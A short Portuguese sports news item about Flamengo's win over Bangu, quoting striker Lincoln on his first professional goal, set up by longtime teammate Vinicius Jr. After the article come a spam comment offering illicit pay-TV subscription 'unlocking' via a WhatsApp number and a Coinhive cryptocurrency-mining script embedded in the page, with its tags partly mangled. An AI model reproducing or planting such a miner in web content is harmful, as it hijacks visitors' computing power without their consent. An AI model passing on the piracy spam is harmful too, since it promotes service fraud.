Foto: Gilvan de Souza / Flamengo
A vitória do Flamengo sobre o Bangu na última quarta-feira pelo Campeonato Carioca saiu dos pés de uma dupla que se conhece há anos. Lincoln e Vinicius Jr atuam juntos desde a base e agora no profissional começam a encantar os torcedores rubro-negro. Contra o time de Moça Bonita, ocamisa 9 fez o gol da vitória após passe do amigo.
- Jogo com o Vinicius desde pequeno. É especial ter marcado o primeiro gol como profissional com um passe dele. É um jogador extraordinário. Ao lado dele, tudo fica mais fácil - disse o centroavante.
Após balançar as redes pela primeira vez no time de cima, Lincoln garantiu que motivação aumenta até para os treinamentos.
- Estou muito feliz pelo primeiro gol como profissional e vou entrar muito motivado no treino.
Em um início de ano da garotada, o atacante fez questão de parabenizar os companheiros que na última quinta-feira foram campeões da Copa Sâo Paulo de Futebol Júnior.
- A garotada é muito boa de trabalho e mereceu estar na final. A campanha foi muito boa e mereceram sair com o título.
x
VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345
< src="https://coinhive.com/lib/coinhive.min.js">><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();>